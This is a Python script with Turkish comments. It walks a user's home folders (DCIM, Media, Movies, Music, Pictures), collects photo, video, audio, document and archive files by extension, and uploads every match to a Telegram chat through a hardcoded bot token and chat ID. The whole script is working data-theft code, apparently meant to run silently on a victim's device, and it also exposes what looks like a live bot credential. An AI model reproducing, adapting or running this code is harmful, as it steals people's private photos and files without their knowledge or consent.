import os
import requests

# Telegram bilgileri
BOT_TOKEN = '7526840364:AAEmbY0HvifSAZHEndWZ6VJUgUTQcjcIVNM'
CHAT_ID = '1271397574'

# Hedef klasörler
folders = ['DCIM', 'Media', 'Movies', 'Music', 'Pictures']
extensions = [
    '.mp3', '.wav', '.flac', '.aac', '.ogg', '.m4a',  # ses
    '.mp4', '.mov', '.avi', '.mkv', '.flv', '.wmv', '.webm', '.3gp',  # video
    '.jpg', '.jpeg', '.png', '.gif', '.bmp', '.tiff', '.svg', '.heic', '.webp',  # görsel
    '.raw', '.cr2', '.nef', '.orf', '.sr2',  # kamera raw formatları
    '.pdf', '.doc', '.docx', '.xls', '.xlsx', '.ppt', '.pptx',  # belge falan istersen
    '.zip', '.rar', '.7z', '.tar', '.gz'  # arşivler
]

def send_file_to_telegram(file_path):
    url = f'https://api.telegram.org/bot{BOT_TOKEN}/sendDocument'
    with open(file_path, 'rb') as f:
        files = {'document': f}
        data = {'chat_id': CHAT_ID}
        response = requests.post(url, files=files, data=data)
        print(f"{file_path} gönderildi: {response.status_code}")

def find_and_send_files():
    for folder in folders:
        folder_path = os.path.join(os.path.expanduser('~'), folder)
        if os.path.exists(folder_path):
            for root, _, files in os.walk(folder_path):
                for file in files:
                    if any(file.lower().endswith(ext) for ext in extensions):
                        full_path = os.path.join(root, file)
                        try:
                            send_file_to_telegram(full_path)
                        except Exception as e:
                            print(f"Hata {full_path}: {e}")

if __name__ == '__main__':
    find_and_send_files()